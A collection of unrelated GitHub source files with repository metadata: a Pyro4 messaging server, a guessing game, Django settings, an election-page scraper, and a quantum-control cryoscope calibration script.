'''When a client wants to know from whom he has pending messages.
Keep in mind that it doesn't check the password.'''
database=sqlite3.connect(os.path.dirname(os.path.realpath(__file__))+"\database.db")
cursor=database.cursor()
cursor.execute("SELECT DISTINCT Sender FROM Messages WHERE Receiver LIKE ?", (nick,))
result=cursor.fetchall()
cursor.close()
return result
def send_data(self, nick, password, senders):
'''Sends the messages coming from senders (a tuple) to a specific contact'''
database=sqlite3.connect(os.path.dirname(os.path.realpath(__file__))+"\database.db")
cursor=database.cursor()
cursor.execute("SELECT Rowid, Nick, Password FROM Users WHERE Nick LIKE ?", (nick,))
existing=cursor.fetchone()
if existing==None or existing[2]!=password:
cursor.close()
return None # the password is wrong
results=[]
for sender in senders:
cursor.execute("SELECT Sender, Date2, Message FROM Messages WHERE Receiver LIKE ? AND Sender Like ?", (nick, sender))
result=cursor.fetchall()
results.append(result)
cursor.execute("DELETE FROM Messages WHERE Receiver LIKE ? and Sender LIKE ?", (nick, sender))
database.commit()
cursor.close()
return results
def new_data(self, sender, receiver, password, message):
'''Receives a message from the sender to its receiver'''
date=datetime.now()
database=sqlite3.connect(os.path.dirname(os.path.realpath(__file__))+"\database.db")
cursor=database.cursor()
cursor.execute("SELECT Rowid, Nick, Password FROM Users WHERE Nick LIKE ?", (sender,))
existing=cursor.fetchone()
if existing!=None:
if existing[1]==sender and existing[2]==password:
pass
else:
cursor.close()
return "wrong username or password"
else:
cursor.close()
return "wrong username or password"
cursor.execute("INSERT INTO Messages VALUES (?, ?, ?, ?)", (sender, receiver, date, message))
database.commit()
cursor.close()
return
def add_contact(self, nick, contact_nick):
'''Adds a contact to one's contact list'''
database=sqlite3.connect(os.path.dirname(os.path.realpath(__file__))+"\database.db")
cursor=database.cursor()
cursor.execute("INSERT OR IGNORE INTO Contacts(Nick, Contact) VALUES (?, ?)", (nick, contact_nick)) # Inserts without repetitions
database.commit()
cursor.close()
def delete_contact(self, nick, contact_nick):
'''Deletes a contact from one's contact list'''
database=sqlite3.connect(os.path.dirname(os.path.realpath(__file__))+"\database.db")
cursor=database.cursor()
cursor.execute("DELETE FROM Contacts WHERE Nick LIKE ? AND Contact LIKE ?", (nick, contact_nick))
database.commit()
cursor.close()
def give_contacts(self, nick):
'''Returns the contacts of a certain nick'''
database=sqlite3.connect(os.path.dirname(os.path.realpath(__file__))+"\database.db")
cursor=database.cursor()
cursor.execute("SELECT Contact FROM Contacts WHERE Nick LIKE ?", (nick,))
results=cursor.fetchall()
cursor.close()
return results
database=sqlite3.connect(os.path.dirname(os.path.realpath(__file__))+"\database.db")
cursor=database.cursor()
try:
cursor.execute("CREATE TABLE Users (Nick text, Password text)")
cursor.execute("CREATE TABLE Messages (Sender text, Receiver text, Date2 text, Message text)")
cursor.execute("CREATE TABLE Contacts (Nick text, Contact text, UNIQUE(Nick, Contact))")
database.commit()
except sqlite3.OperationalError:
pass
cursor.close()
Pyro4.config.HOST
server=Server()
daemon=Pyro4.Daemon()
ns=Pyro4.locateNS()
uri=daemon.register(server)
ns.register("server", uri)
daemon.requestLoop()
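# Usage note (added): clients can reach this object through the Pyro4 name
# server, e.g. server = Pyro4.Proxy("PYRONAME:server"); server.log_in("bob", "pw"),
# assuming a name server is running (started with `python -m Pyro4.naming`).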
|
[
"Darge@users.noreply.github.com"
] |
Darge@users.noreply.github.com
|
9ad135ccde28a412a93e355dd5a5c0dd4cff0f65
|
4314fabe3a4ad80af97066df65340eadc93450c8
|
/The_Perfect_Guess_Game.py
|
795538d562d4128fe00b978ed97da8bc5cbd410e
|
[] |
no_license
|
vishal-project/Python-Projects
|
7bffcd8513c43340c75deb4df415ff4d9cebd8a7
|
0a380e1a344d56cdbe0c05b4a701afce2f8946d6
|
refs/heads/master
| 2023-04-24T02:36:37.147505
| 2021-03-28T18:29:55
| 2021-03-28T18:29:55
| 348,380,379
| 0
| 0
| null | 2021-05-09T14:11:52
| 2021-03-16T14:33:52
|
Python
|
UTF-8
|
Python
| false
| false
| 874
|
py
|
# *********************PROJECT-4 THE PERFECT GUESS************************
# To guess a no. from 1 to 100.
import random
randomNumber = random.randint(1, 100)
print(randomNumber)
userGuess = 0
guessNo = 0
while userGuess != randomNumber:
userGuess = int(input("Enter your Guess from 1 to 100.\n"))
guessNo += 1
if(userGuess==randomNumber):
print(f"You guessed it right in {guessNo} attempts !")
    elif userGuess > randomNumber:
        print("You guessed it wrong!")
        print("Lower No. Plz !")
    elif userGuess < randomNumber:
        print("You guessed it wrong!")
        print("Higher No. Plz !")
with open("hiscore.txt","r") as f:
hiscore= int(f.read())
if guessNo<hiscore:
print("You have just broken the previous record !!!")
with open("hiscore.txt","w") as f:
f.write(str(guessNo))
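# Usage note (added): hiscore.txt must already exist and contain an integer
# (e.g. 100) before the first run, otherwise the open(...) above raises
# FileNotFoundError.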
|
[
"vishal.maurya18995@gmail.com"
] |
vishal.maurya18995@gmail.com
|
947e91a3cfd114e1cb0191e08cdb24dcbe9b8292
|
00f994bb874724a8a22ec69e7d65d26f87c9af24
|
/Snippets/settings.py
|
9e8bfe5394b6c20cdb3cc48cf0e547d15946f3b5
|
[] |
no_license
|
Lubl-42/baruibino
|
5df5219db4795ef9bc9eecd86996d4473bdf8262
|
3e08e2352301c6f944b1f5b9bbb4161c9c0b8926
|
refs/heads/main
| 2023-05-05T02:11:29.207839
| 2021-06-03T11:38:36
| 2021-06-03T11:38:36
| 370,471,602
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,208
|
py
|
"""
Django settings for Snippets project.
Generated by 'django-admin startproject' using Django 3.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve(strict=True).parent.parent
STATICFILES_DIRS=[ BASE_DIR/'static' ]
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '#%3rmpy6hb52y7j^tu7g*v$762rc0&f+26yy3x!j&+@s4(ndq@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'MainApp',
'django_extensions'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Snippets.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Snippets.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
|
[
"noreply@github.com"
] |
Lubl-42.noreply@github.com
|
bde48762b39c43c11c6ea2a63fe088105161ec35
|
15160952eaf4fd203b91850cc1def80b89fb5bea
|
/requester.py
|
b23e95d1be13eede7a4ea0333e361178ff128ef4
|
[] |
no_license
|
gustingonzalez/arg-parliamentary-election-analyzer
|
3cb9bffcdb902dac40c18ba0bfbb4b1c8f0d4555
|
d7352922fc09cac447789b0a10ac44c0fbf2ae01
|
refs/heads/master
| 2021-08-14T07:55:28.949870
| 2017-11-15T01:37:02
| 2017-11-15T01:37:02
| 110,635,901
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,373
|
py
|
# !/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
- Nombre: requester.py
- Descripción: obtiene el conjunto de documentos html, según los parámetros de
la sección "Connection", para luego almacenarlos en el directorio (WebCache)
especificado en el archivo de configuración.
- Autor: Agustín González.
- Modificado: 05/11/17
"""
import os
import sys
import time
import http.client
from lib import utils
class VotingStationRange(object):
"""Rango de mesas de circuito."""
def __init__(self, circuit, init, end):
self.circuit = circuit
self.init = init
self.end = end
def parse_ranges(scircuits, sranges):
"""Realiza parseo de str de config de rangos a lista."""
lcircuits = [x.strip() for x in scircuits.split(",")]
lranges = [x.strip() for x in sranges.split(",")]
if(len(lcircuits) != len(lranges)):
exit("La cantidad de circuitos y de rangos no coincide.")
# Lista de objetos.
ranges = []
# Recorrida de circuitos.
for circuit in lcircuits:
# Pop de ranges y split para obtención de subrangos.
subranges = lranges.pop(0).split(" ")
# Exploración de subrangos
for subrange in subranges:
splitted = subrange.split("-")
init = int(splitted[0])
end = int(splitted[1])
# Creación de vtrange.
vtrange = VotingStationRange(circuit, init, end)
# Append a list.
ranges.append(vtrange)
return ranges
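# Illustrative note (added): with Circuits = "A, B" and Ranges = "1-3 7-9, 10-12"
# (values made up), parse_ranges() yields VotingStationRange objects covering
# (A, 1, 3), (A, 7, 9) and (B, 10, 12) -- one object per space-separated subrange.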
def build_url(url_path_format, province, district, circuit, vtnumber):
"""Realiza build de url en base a parámetros."""
# Fill de circuit con "_" (len debe ser 5).
tofillcircuit = 5 - len(circuit)
filledcircuit = circuit + "_" * tofillcircuit
# Armado de URL.
url = url_path_format.format(province, district, circuit,
vtnumber.zfill(5), filledcircuit)
return url
def save(html, path):
"""Almacena html en path indicado."""
fhtml = open(path, "w")
fhtml.write(html)
fhtml.close()
def main(args):
utils.clearscreen()
    # Read the configuration.
cfg = utils.cfg()
section = "Connection"
# Host.
host = cfg[section]["Host"]
# URL.
url_path_format = cfg[section]["URLPathFormat"]
# Prov. number
province = cfg[section]["Province"]
    # District.
    district = cfg[section]["District"]
    # Voting station ranges per circuit.
vtranges = parse_ranges(cfg[section]["Circuits"],
cfg[section]["Ranges"])
    # Directory.
    dir = cfg["Dirs"]["WebCache"]
    # Create the directory (it is not recreated if it already exists).
utils.makedirs(dir)
    # Iterate over the voting station ranges.
    for vtrange in vtranges:
        # Iterate over the voting stations.
        for vtnumber in range(vtrange.init, vtrange.end+1):
            # 1. Check whether the path already exists.
            print("Station {0} - ".format(vtnumber), end="")
circuit = vtrange.circuit
path = dir + "/" + str(circuit) + "_" + str(vtnumber) + ".htm"
os.path.exists(dir)
            # If the path exists.
            if os.path.exists(path):
                print("Already cached.")
                # No connection is made.
                continue
            # 2. Request to the host.
connection = http.client.HTTPConnection(host, 80)
connection.connect()
url = build_url(url_path_format, province, district,
circuit, str(vtnumber))
connection.request("GET", url)
            # 3. Get the response.
            print("Fetching: " + url)
response = connection.getresponse()
            # 4. Check the response status.
            if(response.status == 404):
                msg = "No response exists from station {0} onwards."
                print(msg.format(vtnumber))
                input("Press ENTER to continue...")
break
            # 5. HTML (decode is used, since read returns bytes).
            html = response.read().decode("utf-8")
            # 6. Save the html under the circuit_vtnumber path.
            save(html, path)
            # 7. Sleep to avoid a possible IP ban.
            time.sleep(0.1)
# Application entry point.
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
[
"agustin.ang.92@gmail.com"
] |
agustin.ang.92@gmail.com
|
1b9bc37ea8783d6db001d18bba0bbd9805adc243
|
263c79fd1d8541f0cf0b5dd9ed1c5e8acd463556
|
/Quantum-Control-Applications/Superconducting/Single-Flux-Tunable-Transmon/17_cryoscope_amplitude_calibration.py
|
be89a108342c5d47a45e3284cfd32425563c5d81
|
[
"BSD-3-Clause"
] |
permissive
|
qua-platform/qua-libs
|
d929681da67fa4e88e96d0f96eef19034146a039
|
245bdeb625e2e64005962a02dcb58d3441e6afc6
|
refs/heads/main
| 2023-09-01T06:04:57.665500
| 2023-08-29T15:01:47
| 2023-08-29T15:01:47
| 293,225,951
| 45
| 13
|
BSD-3-Clause
| 2023-09-05T08:09:32
| 2020-09-06T07:29:42
|
Python
|
UTF-8
|
Python
| false
| false
| 10,604
|
py
|
"""
CRYOSCOPE
The goal of this protocol is to measure the step response of the flux line and design proper FIR and IIR filters
(implemented on the OPX) to pre-distort the flux pulses and improve the two-qubit gates fidelity.
Since the flux line ends on the qubit chip, it is not possible to measure the flux pulse after propagation through the
fridge. The idea is to exploit the flux dependency of the qubit frequency, measured with a modified Ramsey sequence, to
estimate the flux amplitude received by the qubit as a function of time.
The sequence consists of a Ramsey sequence ("x90" - idle time - "x90" or "y90") with a fixed dephasing time.
A flux pulse with varying duration is played during the idle time. The Sx and Sy components of the Bloch vector are
measured by alternatively closing the Ramsey sequence with a "x90" or "y90" gate in order to extract the qubit dephasing
as a function of the flux pulse duration.
The results are then post-processed to retrieve the step function of the flux line which is fitted with an exponential
function. The corresponding exponential parameters are then used to derive the FIR and IIR filter taps that will
compensate for the distortions introduced by the flux line (wiring, bias-tee...).
Such digital filters are then implemented on the OPX.
The protocol is inspired from https://doi.org/10.1063/1.5133894, which contains more details about the sequence and
the post-processing of the data.
This version sweeps the flux pulse duration using the baking tool, which means that the flux pulse can be scanned with
a 1ns resolution, but must be shorter than ~260ns. If you want to measure longer flux pulse, you can either reduce the
resolution (do 2ns steps instead of 1ns) or use the 4ns version (cryoscope_4ns.py).
Prerequisites:
- Having found the resonance frequency of the resonator coupled to the qubit under study (resonator_spectroscopy).
- Having calibrated qubit gates (x90 and y90) by running qubit spectroscopy, rabi_chevron, power_rabi, Ramsey and updated the configuration.
Next steps before going to the next node:
- Update the FIR and IIR filter taps in the configuration (config/controllers/con1/analog_outputs/"filter": {"feedforward": fir, "feedback": iir}).
"""
from qm.qua import *
from qm.QuantumMachinesManager import QuantumMachinesManager
from qm import SimulationConfig, LoopbackInterface
from configuration import *
from macros import ge_averaged_measurement
import matplotlib.pyplot as plt
import numpy as np
from qualang_tools.loops import from_array
from qualang_tools.results import fetching_tool, progress_counter
from qualang_tools.plot import interrupt_on_close
import warnings
warnings.filterwarnings("ignore")
###################
# The QUA program #
###################
n_avg = 10_000 # Number of averages
# Flag to set to True if state discrimination is calibrated (where the qubit state is inferred from the 'I' quadrature).
# Otherwise, a preliminary sequence will be played to measure the averaged I and Q values when the qubit is in |g> and |e>.
state_discrimination = False
# Flux amplitude sweep (as a pre-factor of the flux amplitude)
flux_amp_array = np.linspace(0, -0.2, 101)
with program() as cryoscope_amp:
n = declare(int) # QUA variable for the averaging loop
flux_amp = declare(fixed) # Flux amplitude pre-factor
flag = declare(bool) # QUA boolean to switch between x90 and y90
I = declare(fixed) # QUA variable for the measured 'I' quadrature
Q = declare(fixed) # QUA variable for the measured 'Q' quadrature
if state_discrimination:
state = declare(bool)
state_st = declare_stream()
I_st = declare_stream() # Stream for the 'I' quadrature
Q_st = declare_stream() # Stream for the 'Q' quadrature
n_st = declare_stream() # Stream for the averaging iteration 'n'
if not state_discrimination:
# Calibrate the ground and excited states readout for deriving the Bloch vector
# The ge_averaged_measurement() function is defined in macros.py
# Note that if you have calibrated the readout to perform state discrimination, then the QUA program below can
# be modified to directly fetch the qubit state.
Ig_st, Qg_st, Ie_st, Qe_st = ge_averaged_measurement(thermalization_time, n_avg)
with for_(n, 0, n < n_avg, n + 1):
with for_(*from_array(flux_amp, flux_amp_array)):
with for_each_(flag, [True, False]):
# Play first X/2
play("x90", "qubit")
# Play truncated flux pulse with varying amplitude
align("qubit", "flux_line")
# Wait some time to ensure that the flux pulse will arrive after the x90 pulse
wait(20 * u.ns)
play("const" * amp(flux_amp), "flux_line")
align("qubit", "flux_line")
# Wait some time to ensure that the 2nd x90 pulse will arrive after the flux pulse
wait(20 * u.ns)
# Play second X/2 or Y/2
align("qubit", "flux_line")
with if_(flag):
play("x90", "qubit")
with else_():
play("y90", "qubit")
# Measure resonator state after the sequence
align("resonator", "qubit")
measure(
"readout",
"resonator",
None,
dual_demod.full("cos", "out1", "sin", "out2", I),
dual_demod.full("minus_sin", "out1", "cos", "out2", Q),
)
# State discrimination if the readout has been calibrated
if state_discrimination:
assign(state, I > ge_threshold)
save(state, state_st)
# Wait cooldown time and save the results
wait(thermalization_time * u.ns, "resonator", "qubit")
save(I, I_st)
save(Q, Q_st)
save(n, n_st)
with stream_processing():
# Cast the data into a 2D matrix (x90/y90, flux amplitudes), average the 2D matrices together and store the
# results on the OPX processor
I_st.buffer(2).buffer(len(flux_amp_array)).average().save("I")
Q_st.buffer(2).buffer(len(flux_amp_array)).average().save("Q")
if state_discrimination:
# Also save the qubit state
state_st.boolean_to_int().buffer(2).buffer(len(flux_amp_array)).average().save("state")
else:
# Also save the averaged I/Q values for the qubit in |g> and |e>
Ig_st.average().save("Ig")
Qg_st.average().save("Qg")
Ie_st.average().save("Ie")
Qe_st.average().save("Qe")
n_st.save("iteration")
#####################################
# Open Communication with the QOP #
#####################################
qmm = QuantumMachinesManager(qop_ip, cluster_name=cluster_name, octave=octave_config)
###########################
# Run or Simulate Program #
###########################
simulate = False
if simulate:
# Simulates the QUA program for the specified duration
simulation_config = SimulationConfig(duration=10_000) # In clock cycles = 4ns
job = qmm.simulate(config, cryoscope_amp, simulation_config)
job.get_simulated_samples().con1.plot()
else:
# Open the quantum machine
qm = qmm.open_qm(config)
# Send the QUA program to the OPX, which compiles and executes it
job = qm.execute(cryoscope_amp)
# Get results from QUA program
if state_discrimination:
results = fetching_tool(job, data_list=["I", "Q", "state", "iteration"], mode="live")
else:
results = fetching_tool(job, data_list=["I", "Q", "Ie", "Qe", "Ig", "Qg", "iteration"], mode="live")
# Live plotting
fig = plt.figure()
interrupt_on_close(fig, job) # Interrupts the job when closing the figure
xplot = flux_amp_array * const_flux_amp
while results.is_processing():
# Fetch results
if state_discrimination:
I, Q, state, iteration = results.fetch_all()
# Convert the results into Volts
I, Q = u.demod2volts(I, readout_len), u.demod2volts(Q, readout_len)
# Bloch vector Sx + iSy
qubit_state = (state[:, 0] * 2 - 1) + 1j * (state[:, 1] * 2 - 1)
else:
I, Q, Ie, Qe, Ig, Qg, iteration = results.fetch_all()
# Phase of ground and excited states
phase_g = np.angle(Ig + 1j * Qg)
phase_e = np.angle(Ie + 1j * Qe)
# Phase of cryoscope measurement
phase = np.unwrap(np.angle(I + 1j * Q))
# Population in excited state
state = (phase - phase_g) / (phase_e - phase_g)
# Convert the results into Volts
I, Q = u.demod2volts(I, readout_len), u.demod2volts(Q, readout_len)
# Bloch vector Sx + iSy
qubit_state = (state[:, 0] * 2 - 1) + 1j * (state[:, 1] * 2 - 1)
# Accumulated phase: angle between Sx and Sy
qubit_phase = np.unwrap(np.angle(qubit_state))
# qubit_phase = qubit_phase - qubit_phase[-1]
detuning = qubit_phase / (2 * np.pi * const_flux_len) * 1000
# Qubit coherence: |Sx+iSy|
qubit_coherence = np.abs(qubit_state)
# Quadratic fit of detuning versus flux pulse amplitude
pol = np.polyfit(xplot, qubit_phase, deg=2)
# Progress bar
progress_counter(iteration, n_avg, start_time=results.get_start_time())
# Plots
plt.subplot(221)
plt.cla()
plt.plot(xplot, np.sqrt(I**2 + Q**2))
plt.xlabel("Flux pulse amplitude [V]")
plt.ylabel("Readout amplitude [a.u.]")
plt.legend(("X", "Y"), loc="lower right")
plt.subplot(222)
plt.cla()
plt.plot(xplot, phase)
plt.xlabel("Flux pulse amplitude [V]")
plt.ylabel("Readout phase [rad]")
plt.legend(("X", "Y"), loc="lower right")
plt.subplot(223)
plt.cla()
plt.plot(xplot, state)
plt.xlabel("Flux pulse amplitude [V]")
plt.ylabel("Excited state population")
plt.legend(("X", "Y"), loc="lower right")
plt.subplot(224)
plt.cla()
plt.plot(xplot, detuning, "bo")
plt.plot(xplot, np.polyval(pol, xplot), "r-")
plt.xlabel("Flux pulse amplitude [V]")
plt.ylabel("Averaged detuning [Hz]")
plt.legend(("data", "Fit"), loc="upper right")
plt.tight_layout()
plt.pause(0.1)
# Close the quantum machines at the end in order to put all flux biases to 0 so that the fridge doesn't heat-up
qm.close()
|
[
"noreply@github.com"
] |
qua-platform.noreply@github.com
|